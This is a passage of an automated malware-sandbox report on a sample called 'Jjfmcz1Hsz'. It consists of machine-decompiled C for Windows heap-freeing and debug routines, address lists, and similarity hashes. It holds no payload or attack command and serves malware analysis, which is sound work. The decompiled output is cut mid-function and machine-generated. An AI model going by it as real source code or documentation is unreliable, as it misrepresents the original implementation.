                                                                                                                                                                            										 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t140 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
                                                                                                                                                                            										if(E1D8404C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
                                                                                                                                                                            											goto L25;
                                                                                                                                                                            										}
                                                                                                                                                                            										_t152 = 0xc0150004;
                                                                                                                                                                            										L24:
                                                                                                                                                                            										 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
                                                                                                                                                                            										goto L25;
                                                                                                                                                                            									}
                                                                                                                                                                            									_t152 = 0xc0150005;
                                                                                                                                                                            									goto L24;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L11;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				L1:
                                                                                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t156 - 0x10));
                                                                                                                                                                            				return _t152;
                                                                                                                                                                            			}















                                                                                                                                                                            0x1d829046
                                                                                                                                                                            0x1d829046
                                                                                                                                                                            0x1d82904b
                                                                                                                                                                            0x1d829050
                                                                                                                                                                            0x1d829055
                                                                                                                                                                            0x1d82905b
                                                                                                                                                                            0x1d82905d
                                                                                                                                                                            0x1d829066
                                                                                                                                                                            0x1d82906f
                                                                                                                                                                            0x1d829078
                                                                                                                                                                            0x1d829080
                                                                                                                                                                            0x1d829088
                                                                                                                                                                            0x1d82908f
                                                                                                                                                                            0x1d829095
                                                                                                                                                                            0x1d8290a9
                                                                                                                                                                            0x1d8290b1
                                                                                                                                                                            0x1d8290be
                                                                                                                                                                            0x1d8290c6
                                                                                                                                                                            0x1d8290cf
                                                                                                                                                                            0x1d8290e2
                                                                                                                                                                            0x1d8290f7
                                                                                                                                                                            0x1d8290fb
                                                                                                                                                                            0x1d829118
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d829123
                                                                                                                                                                            0x1d82913b
                                                                                                                                                                            0x1d82913f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d829147
                                                                                                                                                                            0x1d88231f
                                                                                                                                                                            0x1d88231f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d88231f
                                                                                                                                                                            0x1d829154
                                                                                                                                                                            0x1d882330
                                                                                                                                                                            0x1d882336
                                                                                                                                                                            0x1d882336
                                                                                                                                                                            0x1d82915a
                                                                                                                                                                            0x1d82915a
                                                                                                                                                                            0x1d82915a
                                                                                                                                                                            0x1d829161
                                                                                                                                                                            0x1d829167
                                                                                                                                                                            0x1d82916b
                                                                                                                                                                            0x1d829172
                                                                                                                                                                            0x1d829182
                                                                                                                                                                            0x1d82918e
                                                                                                                                                                            0x1d829199
                                                                                                                                                                            0x1d8291ba
                                                                                                                                                                            0x1d8291be
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8291e0
                                                                                                                                                                            0x1d882358
                                                                                                                                                                            0x1d882360
                                                                                                                                                                            0x1d882368
                                                                                                                                                                            0x1d88236a
                                                                                                                                                                            0x1d882372
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d882378
                                                                                                                                                                            0x1d882378
                                                                                                                                                                            0x1d882381
                                                                                                                                                                            0x1d882458
                                                                                                                                                                            0x1d882458
                                                                                                                                                                            0x1d88245b
                                                                                                                                                                            0x1d882463
                                                                                                                                                                            0x1d882468
                                                                                                                                                                            0x1d88246e
                                                                                                                                                                            0x1d88246e
                                                                                                                                                                            0x1d8824a7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8824a7
                                                                                                                                                                            0x1d88238f
                                                                                                                                                                            0x1d882396
                                                                                                                                                                            0x1d88239c
                                                                                                                                                                            0x1d88239f
                                                                                                                                                                            0x1d88239f
                                                                                                                                                                            0x1d8823bb
                                                                                                                                                                            0x1d8823c8
                                                                                                                                                                            0x1d8823ca
                                                                                                                                                                            0x1d8823d2
                                                                                                                                                                            0x1d88244c
                                                                                                                                                                            0x1d88244c
                                                                                                                                                                            0x1d882453
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8823d4
                                                                                                                                                                            0x1d8823e7
                                                                                                                                                                            0x1d8823e9
                                                                                                                                                                            0x1d8823f1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8823f9
                                                                                                                                                                            0x1d882402
                                                                                                                                                                            0x1d882408
                                                                                                                                                                            0x1d88240c
                                                                                                                                                                            0x1d882413
                                                                                                                                                                            0x1d882423
                                                                                                                                                                            0x1d88243f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d882441
                                                                                                                                                                            0x1d882446
                                                                                                                                                                            0x1d882446
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d882446
                                                                                                                                                                            0x1d8823fb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8823fb
                                                                                                                                                                            0x1d8823d2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d882372
                                                                                                                                                                            0x1d8291be
                                                                                                                                                                            0x1d829118
                                                                                                                                                                            0x1d8290fd
                                                                                                                                                                            0x1d829102
                                                                                                                                                                            0x1d82910e

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                            • String ID: $$@$@wvu
                                                                                                                                                                            • API String ID: 3446177414-2337624265
                                                                                                                                                                            • Opcode ID: d487b5dfcc13e2e40606edda6e82f72dcb1f576c9815162bcc389a743c1c3a9e
                                                                                                                                                                            • Instruction ID: 78187c0f893d00879f6b0bce87cf9e48f32da36e407b24a71b5bfc2bd0f6764b
                                                                                                                                                                            • Opcode Fuzzy Hash: d487b5dfcc13e2e40606edda6e82f72dcb1f576c9815162bcc389a743c1c3a9e
                                                                                                                                                                            • Instruction Fuzzy Hash: B2813D75D442699BDB21DF54CC80BEEB6B8AF08750F0141EAE91DB7290D7309E85CFA2
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 67%
                                                                                                                                                                            			E1D8CF8F8(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                            				signed int _t73;
                                                                                                                                                                            				signed int _t75;
                                                                                                                                                                            				signed int _t79;
                                                                                                                                                                            				intOrPtr _t81;
                                                                                                                                                                            				signed int _t82;
                                                                                                                                                                            				signed char _t86;
                                                                                                                                                                            				signed int _t87;
                                                                                                                                                                            				intOrPtr _t89;
                                                                                                                                                                            				intOrPtr _t93;
                                                                                                                                                                            				intOrPtr _t103;
                                                                                                                                                                            				signed int _t120;
                                                                                                                                                                            				signed char _t131;
                                                                                                                                                                            				intOrPtr _t133;
                                                                                                                                                                            				signed int _t136;
                                                                                                                                                                            				signed int _t151;
                                                                                                                                                                            				signed int* _t154;
                                                                                                                                                                            				signed int _t158;
                                                                                                                                                                            				signed int* _t160;
                                                                                                                                                                            				intOrPtr* _t164;
                                                                                                                                                                            				void* _t165;
                                                                                                                                                                            
                                                                                                                                                                            				_push(0x34);
                                                                                                                                                                            				_push(0x1d8fd2f8);
                                                                                                                                                                            				E1D877BE4(__ebx, __edi, __esi);
                                                                                                                                                                            				 *(_t165 - 0x34) = __edx;
                                                                                                                                                                            				_t162 = __ecx;
                                                                                                                                                                            				 *((intOrPtr*)(_t165 - 0x30)) = __ecx;
                                                                                                                                                                            				_t158 = 0;
                                                                                                                                                                            				 *(_t165 - 0x28) = 0;
                                                                                                                                                                            				 *((char*)(_t165 - 0x19)) = 0;
                                                                                                                                                                            				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
                                                                                                                                                                            					 *((intOrPtr*)(_t165 - 4)) = 0;
                                                                                                                                                                            					 *((intOrPtr*)(_t165 - 4)) = 1;
                                                                                                                                                                            					_t73 = E1D817662("RtlFreeHeap");
                                                                                                                                                                            					__eflags = _t73;
                                                                                                                                                                            					if(_t73 == 0) {
                                                                                                                                                                            						_t158 = 0;
                                                                                                                                                                            						 *(_t165 - 0x28) = 0;
                                                                                                                                                                            						L34:
                                                                                                                                                                            						 *((intOrPtr*)(_t165 - 4)) = 0;
                                                                                                                                                                            						 *((intOrPtr*)(_t165 - 4)) = 0xfffffffe;
                                                                                                                                                                            						E1D8CFBB7();
                                                                                                                                                                            						_t75 = _t158;
                                                                                                                                                                            						goto L35;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t131 =  *(__ecx + 0x44) |  *(_t165 - 0x34);
                                                                                                                                                                            					 *(_t165 - 0x2c) = _t131;
                                                                                                                                                                            					 *(_t165 - 0x34) = _t131 | 0x10000000;
                                                                                                                                                                            					__eflags = _t131 & 0x00000001;
                                                                                                                                                                            					if((_t131 & 0x00000001) == 0) {
                                                                                                                                                                            						E1D82FED0( *((intOrPtr*)(__ecx + 0xc8)));
                                                                                                                                                                            						 *((char*)(_t165 - 0x19)) = 1;
                                                                                                                                                                            						_t120 =  *(_t165 - 0x2c) | 0x10000001;
                                                                                                                                                                            						__eflags = _t120;
                                                                                                                                                                            						 *(_t165 - 0x34) = _t120;
                                                                                                                                                                            					}
                                                                                                                                                                            					E1D8D0835(_t162, 0);
                                                                                                                                                                            					_t151 =  *((intOrPtr*)(_t165 + 8)) + 0xfffffff8;
                                                                                                                                                                            					__eflags =  *((char*)(_t151 + 7)) - 5;
                                                                                                                                                                            					if( *((char*)(_t151 + 7)) == 5) {
                                                                                                                                                                            						_t151 = _t151 - (( *(_t151 + 6) & 0x000000ff) << 3);
                                                                                                                                                                            						__eflags = _t151;
                                                                                                                                                                            					}
                                                                                                                                                                            					 *(_t165 - 0x24) = _t151;
                                                                                                                                                                            					 *(_t165 - 0x2c) = _t151;
                                                                                                                                                                            					_t133 = _t162;
                                                                                                                                                                            					_t79 = E1D81753F(_t133, _t151, "RtlFreeHeap");
                                                                                                                                                                            					__eflags = _t79;
                                                                                                                                                                            					if(_t79 == 0) {
                                                                                                                                                                            						goto L34;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						__eflags =  *((intOrPtr*)(_t165 + 8)) -  *0x1d9147d0; // 0x0
                                                                                                                                                                            						_t81 =  *[fs:0x30];
                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                            							_t82 =  *(_t81 + 0x68);
                                                                                                                                                                            							 *(_t165 - 0x3c) = _t82;
                                                                                                                                                                            							__eflags = _t82 & 0x00000800;
                                                                                                                                                                            							if((_t82 & 0x00000800) == 0) {
                                                                                                                                                                            								L32:
                                                                                                                                                                            								_t158 = E1D833BC0(_t162,  *(_t165 - 0x34),  *((intOrPtr*)(_t165 + 8)));
                                                                                                                                                                            								 *(_t165 - 0x28) = _t158;
                                                                                                                                                                            								E1D8D0D24( *((intOrPtr*)(_t165 - 0x30)));
                                                                                                                                                                            								E1D8D0835( *((intOrPtr*)(_t165 - 0x30)), 0);
                                                                                                                                                                            								goto L34;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags =  *0x1d9147d4;
                                                                                                                                                                            							if( *0x1d9147d4 == 0) {
                                                                                                                                                                            								goto L32;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t160 =  *(_t165 - 0x2c);
                                                                                                                                                                            							_t154 =  *(_t165 - 0x24);
                                                                                                                                                                            							__eflags =  *(_t162 + 0x4c);
                                                                                                                                                                            							if( *(_t162 + 0x4c) != 0) {
                                                                                                                                                                            								 *_t160 =  *_t160 ^  *(_t162 + 0x50);
                                                                                                                                                                            								_t38 =  &(_t154[0]); // 0xffff
                                                                                                                                                                            								_t39 =  &(_t154[0]); // 0xffffff
                                                                                                                                                                            								__eflags = _t160[0] - ( *_t38 ^  *_t39 ^  *_t154);
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									_push(_t133);
                                                                                                                                                                            									E1D8DD646(0, _t162, _t160, _t160, _t162, __eflags);
                                                                                                                                                                            									_t154 =  *(_t165 - 0x24);
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _t160[0] & 0x00000002;
                                                                                                                                                                            							if((_t160[0] & 0x00000002) == 0) {
                                                                                                                                                                            								_t86 = _t160[0];
                                                                                                                                                                            								 *(_t165 - 0x1a) = _t86;
                                                                                                                                                                            								_t87 = _t86 & 0x000000ff;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t103 = E1D853AE9(_t160);
                                                                                                                                                                            								 *((intOrPtr*)(_t165 - 0x40)) = _t103;
                                                                                                                                                                            								_t87 =  *(_t103 + 2) & 0x0000ffff;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t136 = _t87;
                                                                                                                                                                            							 *(_t165 - 0x20) = _t87;
                                                                                                                                                                            							__eflags =  *(_t162 + 0x4c);
                                                                                                                                                                            							if( *(_t162 + 0x4c) != 0) {
                                                                                                                                                                            								_t51 =  &(_t154[0]); // 0xffff
                                                                                                                                                                            								_t52 =  &(_t154[0]); // 0xffffff
                                                                                                                                                                            								_t160[0] =  *_t51 ^  *_t52 ^  *_t154;
                                                                                                                                                                            								 *_t160 =  *_t160 ^  *(_t162 + 0x50);
                                                                                                                                                                            								__eflags =  *_t160;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _t136;
                                                                                                                                                                            							if(_t136 != 0) {
                                                                                                                                                                            								__eflags = _t136 -  *0x1d9147d4; // 0x0
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									goto L32;
                                                                                                                                                                            								}
                                                                                                                                                                            								__eflags =  *((intOrPtr*)(_t162 + 0x7c)) -  *0x1d9147d6; // 0x0
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									goto L32;
                                                                                                                                                                            								}
                                                                                                                                                                            								_t89 =  *[fs:0x30];
                                                                                                                                                                            								__eflags =  *(_t89 + 0xc);
                                                                                                                                                                            								if( *(_t89 + 0xc) == 0) {
                                                                                                                                                                            									_push("HEAP: ");
                                                                                                                                                                            									E1D81B910();
                                                                                                                                                                            								} else {
                                                                                                                                                                            									E1D81B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                                            								}
                                                                                                                                                                            								_push(E1D8C823A(_t162,  *(_t165 - 0x20)));
                                                                                                                                                                            								E1D81B910("About to free block at %p with tag %ws\n",  *((intOrPtr*)(_t165 + 8)));
                                                                                                                                                                            								L30:
                                                                                                                                                                            								_t93 =  *[fs:0x30];
                                                                                                                                                                            								__eflags =  *((char*)(_t93 + 2));
                                                                                                                                                                            								if( *((char*)(_t93 + 2)) != 0) {
                                                                                                                                                                            									 *0x1d9147a1 = 1;
                                                                                                                                                                            									 *0x1d914100 = 0;
                                                                                                                                                                            									asm("int3");
                                                                                                                                                                            									 *0x1d9147a1 = 0;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L32;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags =  *(_t81 + 0xc);
                                                                                                                                                                            						if( *(_t81 + 0xc) == 0) {
                                                                                                                                                                            							_push("HEAP: ");
                                                                                                                                                                            							E1D81B910();
                                                                                                                                                                            						} else {
                                                                                                                                                                            							E1D81B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                                            						}
                                                                                                                                                                            						E1D81B910("About to free block at %p\n",  *0x1d9147d0);
                                                                                                                                                                            						goto L30;
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t164 =  *0x1d913750; // 0x0
                                                                                                                                                                            					 *0x1d9191e0(__ecx, __edx,  *((intOrPtr*)(_t165 + 8)));
                                                                                                                                                                            					_t75 =  *_t164() & 0x000000ff;
                                                                                                                                                                            					L35:
                                                                                                                                                                            					 *[fs:0x0] =  *((intOrPtr*)(_t165 - 0x10));
                                                                                                                                                                            					return _t75;
                                                                                                                                                                            				}
                                                                                                                                                                            			}























                                                                                                                                                                            0x1d8cf8f8
                                                                                                                                                                            0x1d8cf8fa
                                                                                                                                                                            0x1d8cf8ff
                                                                                                                                                                            0x1d8cf906
                                                                                                                                                                            0x1d8cf909
                                                                                                                                                                            0x1d8cf90b
                                                                                                                                                                            0x1d8cf910
                                                                                                                                                                            0x1d8cf912
                                                                                                                                                                            0x1d8cf915
                                                                                                                                                                            0x1d8cf91f
                                                                                                                                                                            0x1d8cf93e
                                                                                                                                                                            0x1d8cf941
                                                                                                                                                                            0x1d8cf94f
                                                                                                                                                                            0x1d8cf954
                                                                                                                                                                            0x1d8cf956
                                                                                                                                                                            0x1d8cfb8c
                                                                                                                                                                            0x1d8cfb8e
                                                                                                                                                                            0x1d8cfb91
                                                                                                                                                                            0x1d8cfb91
                                                                                                                                                                            0x1d8cfb94
                                                                                                                                                                            0x1d8cfb9b
                                                                                                                                                                            0x1d8cfba0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8cfba0
                                                                                                                                                                            0x1d8cf95f
                                                                                                                                                                            0x1d8cf962
                                                                                                                                                                            0x1d8cf96c
                                                                                                                                                                            0x1d8cf96f
                                                                                                                                                                            0x1d8cf972
                                                                                                                                                                            0x1d8cf97a
                                                                                                                                                                            0x1d8cf97f
                                                                                                                                                                            0x1d8cf986
                                                                                                                                                                            0x1d8cf986
                                                                                                                                                                            0x1d8cf98b
                                                                                                                                                                            0x1d8cf98b
                                                                                                                                                                            0x1d8cf992
                                                                                                                                                                            0x1d8cf99a
                                                                                                                                                                            0x1d8cf99d
                                                                                                                                                                            0x1d8cf9a1
                                                                                                                                                                            0x1d8cf9aa
                                                                                                                                                                            0x1d8cf9aa
                                                                                                                                                                            0x1d8cf9aa
                                                                                                                                                                            0x1d8cf9ac
                                                                                                                                                                            0x1d8cf9af
                                                                                                                                                                            0x1d8cf9b7
                                                                                                                                                                            0x1d8cf9b9
                                                                                                                                                                            0x1d8cf9be
                                                                                                                                                                            0x1d8cf9c0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8cf9c6
                                                                                                                                                                            0x1d8cf9c9
                                                                                                                                                                            0x1d8cf9cf
                                                                                                                                                                            0x1d8cf9d5
                                                                                                                                                                            0x1d8cfa1b
                                                                                                                                                                            0x1d8cfa1e
                                                                                                                                                                            0x1d8cfa21
                                                                                                                                                                            0x1d8cfa26
                                                                                                                                                                            0x1d8cfb2b
                                                                                                                                                                            0x1d8cfb37
                                                                                                                                                                            0x1d8cfb39
                                                                                                                                                                            0x1d8cfb41
                                                                                                                                                                            0x1d8cfb4b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8cfb4b
                                                                                                                                                                            0x1d8cfa2c
                                                                                                                                                                            0x1d8cfa33
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8cfa39
                                                                                                                                                                            0x1d8cfa3c
                                                                                                                                                                            0x1d8cfa3f
                                                                                                                                                                            0x1d8cfa42
                                                                                                                                                                            0x1d8cfa47
                                                                                                                                                                            0x1d8cfa49
                                                                                                                                                                            0x1d8cfa4c
                                                                                                                                                                            0x1d8cfa51
                                                                                                                                                                            0x1d8cfa54
                                                                                                                                                                            0x1d8cfa56
                                                                                                                                                                            0x1d8cfa5b
                                                                                                                                                                            0x1d8cfa60
                                                                                                                                                                            0x1d8cfa60
                                                                                                                                                                            0x1d8cfa54
                                                                                                                                                                            0x1d8cfa63
                                                                                                                                                                            0x1d8cfa67
                                                                                                                                                                            0x1d8cfa79
                                                                                                                                                                            0x1d8cfa7c
                                                                                                                                                                            0x1d8cfa7f
                                                                                                                                                                            0x1d8cfa69
                                                                                                                                                                            0x1d8cfa6b
                                                                                                                                                                            0x1d8cfa70
                                                                                                                                                                            0x1d8cfa73
                                                                                                                                                                            0x1d8cfa73
                                                                                                                                                                            0x1d8cfa82
                                                                                                                                                                            0x1d8cfa84
                                                                                                                                                                            0x1d8cfa88
                                                                                                                                                                            0x1d8cfa8b
                                                                                                                                                                            0x1d8cfa8d
                                                                                                                                                                            0x1d8cfa90
                                                                                                                                                                            0x1d8cfa95
                                                                                                                                                                            0x1d8cfa9b
                                                                                                                                                                            0x1d8cfa9b
                                                                                                                                                                            0x1d8cfa9b
                                                                                                                                                                            0x1d8cfa9d
                                                                                                                                                                            0x1d8cfaa0
                                                                                                                                                                            0x1d8cfaa6
                                                                                                                                                                            0x1d8cfaad
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8cfab3
                                                                                                                                                                            0x1d8cfaba
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8cfabc
                                                                                                                                                                            0x1d8cfac2
                                                                                                                                                                            0x1d8cfac5
                                                                                                                                                                            0x1d8cfae4
                                                                                                                                                                            0x1d8cfae9
                                                                                                                                                                            0x1d8cfac7
                                                                                                                                                                            0x1d8cfadc
                                                                                                                                                                            0x1d8cfae1
                                                                                                                                                                            0x1d8cfafa
                                                                                                                                                                            0x1d8cfb03
                                                                                                                                                                            0x1d8cfb0b
                                                                                                                                                                            0x1d8cfb0b
                                                                                                                                                                            0x1d8cfb11
                                                                                                                                                                            0x1d8cfb15
                                                                                                                                                                            0x1d8cfb17
                                                                                                                                                                            0x1d8cfb1e
                                                                                                                                                                            0x1d8cfb24
                                                                                                                                                                            0x1d8cfb25
                                                                                                                                                                            0x1d8cfb25
                                                                                                                                                                            0x1d8cfb15
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8cfaa0
                                                                                                                                                                            0x1d8cf9d7
                                                                                                                                                                            0x1d8cf9da
                                                                                                                                                                            0x1d8cf9f9
                                                                                                                                                                            0x1d8cf9fe
                                                                                                                                                                            0x1d8cf9dc
                                                                                                                                                                            0x1d8cf9f1
                                                                                                                                                                            0x1d8cf9f6
                                                                                                                                                                            0x1d8cfa0f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8cfa15
                                                                                                                                                                            0x1d8cf921
                                                                                                                                                                            0x1d8cf926
                                                                                                                                                                            0x1d8cf92e
                                                                                                                                                                            0x1d8cf936
                                                                                                                                                                            0x1d8cfba2
                                                                                                                                                                            0x1d8cfba5
                                                                                                                                                                            0x1d8cfbb1
                                                                                                                                                                            0x1d8cfbb1

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                            • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                                                                            • API String ID: 3446177414-3492000579
                                                                                                                                                                            • Opcode ID: 5a3a691cf27dedccaf5062d9df041fee392b30293a1cd9ed95b695e79d62113d
                                                                                                                                                                            • Instruction ID: 118a2841c5067453f24eaa0d24905b8ffc57418f19cbeb4f00865278fe5e3238
                                                                                                                                                                            • Opcode Fuzzy Hash: 5a3a691cf27dedccaf5062d9df041fee392b30293a1cd9ed95b695e79d62113d
                                                                                                                                                                            • Instruction Fuzzy Hash: 5C71FC3290A685DFDB02CFA8D8906EDFBF2FF49224F068159E5459B361C730E945CB42
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 59%
                                                                                                                                                                            			E1D816565(intOrPtr* __ecx) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				char _v16;
                                                                                                                                                                            				char _v92;
                                                                                                                                                                            				char _v93;
                                                                                                                                                                            				char _v100;
                                                                                                                                                                            				signed short _v106;
                                                                                                                                                                            				char _v108;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				intOrPtr* _t56;
                                                                                                                                                                            				signed char _t67;
                                                                                                                                                                            				intOrPtr _t76;
                                                                                                                                                                            				signed char _t81;
                                                                                                                                                                            				signed int _t86;
                                                                                                                                                                            				signed int _t87;
                                                                                                                                                                            				char _t88;
                                                                                                                                                                            				intOrPtr _t103;
                                                                                                                                                                            				signed int _t106;
                                                                                                                                                                            				intOrPtr* _t110;
                                                                                                                                                                            				signed int _t111;
                                                                                                                                                                            				signed int _t112;
                                                                                                                                                                            				intOrPtr _t113;
                                                                                                                                                                            				signed int _t114;
                                                                                                                                                                            				intOrPtr* _t116;
                                                                                                                                                                            				signed int _t117;
                                                                                                                                                                            				void* _t118;
                                                                                                                                                                            
                                                                                                                                                                            				_v8 =  *0x1d91b370 ^ _t117;
                                                                                                                                                                            				_v93 = 1;
                                                                                                                                                                            				_t110 = __ecx;
                                                                                                                                                                            				E1D83E8A6(0, 0x4001,  &_v92);
                                                                                                                                                                            				_t106 =  *0x7ffe0330;
                                                                                                                                                                            				_t86 =  *0x1d919200; // 0x0
                                                                                                                                                                            				_t113 = 0x20;
                                                                                                                                                                            				 *0x1d9165f8 = 1;
                                                                                                                                                                            				_t92 = _t113 - (_t106 & 0x0000001f);
                                                                                                                                                                            				asm("ror ebx, cl");
                                                                                                                                                                            				_t87 = _t86 ^ _t106;
                                                                                                                                                                            				if( *__ecx == 0) {
                                                                                                                                                                            					L8:
                                                                                                                                                                            					_t88 = _v93;
                                                                                                                                                                            					L9:
                                                                                                                                                                            					if(_v16 != 0) {
                                                                                                                                                                            						E1D84E7E0(_t92, _v92);
                                                                                                                                                                            					}
                                                                                                                                                                            					_t114 =  *0x1d919210; // 0x0
                                                                                                                                                                            					asm("ror esi, cl");
                                                                                                                                                                            					 *0x1d9191e0();
                                                                                                                                                                            					 *(_t114 ^  *0x7ffe0330)();
                                                                                                                                                                            					_t108 =  *0x7ffe0330;
                                                                                                                                                                            					_t111 =  *0x1d919218; // 0x0
                                                                                                                                                                            					_push(0x20);
                                                                                                                                                                            					asm("ror edi, cl");
                                                                                                                                                                            					_t112 = _t111 ^  *0x7ffe0330;
                                                                                                                                                                            					E1D82FED0(0x1d9132d8);
                                                                                                                                                                            					_t98 = 0x1d915d8c;
                                                                                                                                                                            					if( *0x1d9165f0 != 0) {
                                                                                                                                                                            						_t56 =  *0x1d915d8c; // 0x17b2ce0
                                                                                                                                                                            						while(1) {
                                                                                                                                                                            							__eflags = _t56 - _t98;
                                                                                                                                                                            							if(_t56 == _t98) {
                                                                                                                                                                            								break;
                                                                                                                                                                            							}
                                                                                                                                                                            							_v100 = _t56;
                                                                                                                                                                            							_t39 = _t56 + 0x35;
                                                                                                                                                                            							 *_t39 =  *(_t56 + 0x35) & 0x000000f7;
                                                                                                                                                                            							__eflags =  *_t39;
                                                                                                                                                                            							_t56 =  *_t56;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L11;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						L11:
                                                                                                                                                                            						_t116 =  *0x1d915d8c; // 0x17b2ce0
                                                                                                                                                                            						if( *0x1d9165f4 < 2) {
                                                                                                                                                                            							_t116 =  *_t116;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t116 == _t98) {
                                                                                                                                                                            							L15:
                                                                                                                                                                            							 *0x1d9165f0 = 1;
                                                                                                                                                                            							 *0x1d9165f8 = 0;
                                                                                                                                                                            							E1D82E740(_t98);
                                                                                                                                                                            							E1D81676F(_t98);
                                                                                                                                                                            							return E1D864B50(_t88, _t88, _v8 ^ _t117, _t108, _t112, _t116, 0x1d9132d8);
                                                                                                                                                                            						} else {
                                                                                                                                                                            							do {
                                                                                                                                                                            								_v100 = _t116;
                                                                                                                                                                            								_t108 = _t112;
                                                                                                                                                                            								_t24 = _t116 + 0x50; // 0x17b2ca8
                                                                                                                                                                            								_t98 =  *_t24;
                                                                                                                                                                            								E1D816704( *_t24, _t112);
                                                                                                                                                                            								_t116 =  *_t116;
                                                                                                                                                                            							} while (_t116 != 0x1d915d8c);
                                                                                                                                                                            							goto L15;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					goto L1;
                                                                                                                                                                            				}
                                                                                                                                                                            				do {
                                                                                                                                                                            					L1:
                                                                                                                                                                            					E1D865050(_t92,  &_v108, _t110);
                                                                                                                                                                            					_t92 = E1D816B45( &_v108,  &_v92, 1,  &_v100);
                                                                                                                                                                            					if(_t92 < 0) {
                                                                                                                                                                            						_t67 =  *0x1d9137c0; // 0x0
                                                                                                                                                                            						__eflags = _t67 & 0x00000003;
